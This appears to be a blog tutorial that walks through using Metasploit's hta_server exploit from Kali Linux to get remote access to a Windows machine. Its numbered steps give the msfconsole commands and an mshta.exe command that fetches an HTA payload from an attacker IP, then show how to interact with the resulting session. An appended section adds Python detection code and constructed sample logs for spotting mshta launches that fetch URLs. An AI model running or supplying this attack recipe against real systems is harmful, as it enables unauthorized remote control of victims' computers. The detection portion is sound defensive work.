Today I will demo the new Windows hta_server RCE exploit, which gives hackers and penetration testers remote access to a Windows computer. The exploit was publicly disclosed in late 2016 but did not come to wider public attention until late 2018. It is available in Metasploit and is easy to use from a Kali Linux distribution.
STEP 1:
Check your IP configuration (in this practical I have kept it on Bridge)
STEP 2:
Fire up msfconsole in the Kali terminal and search for hta_server.
Commands:
service apache2 start
msfconsole
search HTA
use exploit/windows/misc/hta_server
Open PowerShell on Windows and execute the following command (a different URL will be generated in your case):
.\mshta.exe http://192.168.43.15:8080/Zhh7aIVVD.hta
Once the command executes, it opens a session in msfconsole.
You can view the session using the following command:
sessions -l
Note the ID value, then type the following command to interact with the session:
sessions -i <ID>
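On the defensive side, the mshta.exe command above leaves a clear trace in process-creation logs: mshta.exe started with an http(s) URL as its argument. The following is an added example, not part of the original post, that flags such launches in records using Sysmon Event ID 1 field names (Image, OriginalFileName, ParentImage, CommandLine); the host names and sample records are constructed, and only the first URL is the one shown in this post.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# An http(s) URL argument, quoted or not.
URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)

def is_mshta(event):
    """True for mshta.exe, including a copy renamed on disk."""
    image = basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").lower()
    return "mshta.exe" in (image, original)

def flag_remote_mshta(events):
    """Return (host, parent process, url) for each mshta launch that fetches a URL."""
    hits = []
    for ev in events:
        if not is_mshta(ev):
            continue
        match = URL_RE.search(ev.get("CommandLine", ""))
        if match:
            parent = basename(ev.get("ParentImage", "")).lower()
            hits.append((ev.get("Computer", "unknown"), parent, match.group(0)))
    return hits

# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Image": r"C:\Windows\System32\mshta.exe",
     "OriginalFileName": "MSHTA.EXE",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://192.168.43.15:8080/Zhh7aIVVD.hta'},
    # Local HTA file: no URL, so it is not flagged.
    {"Computer": "WS02", "Image": r"C:\Windows\System32\mshta.exe",
     "OriginalFileName": "MSHTA.EXE", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Tools\setup.hta'},
    # Renamed copy with a quoted, upper-case URL: caught via OriginalFileName.
    {"Computer": "WS03", "Image": r"C:\Users\Public\update.exe",
     "OriginalFileName": "MSHTA.EXE", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'update.exe "HTTPS://example.test/a.hta"'},
    # A different binary with a URL argument: out of scope for this rule.
    {"Computer": "WS04", "Image": r"C:\Windows\System32\curl.exe",
     "OriginalFileName": "curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe http://example.test/file.txt"},
]

if __name__ == "__main__":
    for host, parent, url in flag_remote_mshta(SAMPLE_EVENTS):
        print(f"{host}: mshta.exe started by {parent} fetched {url}")
```
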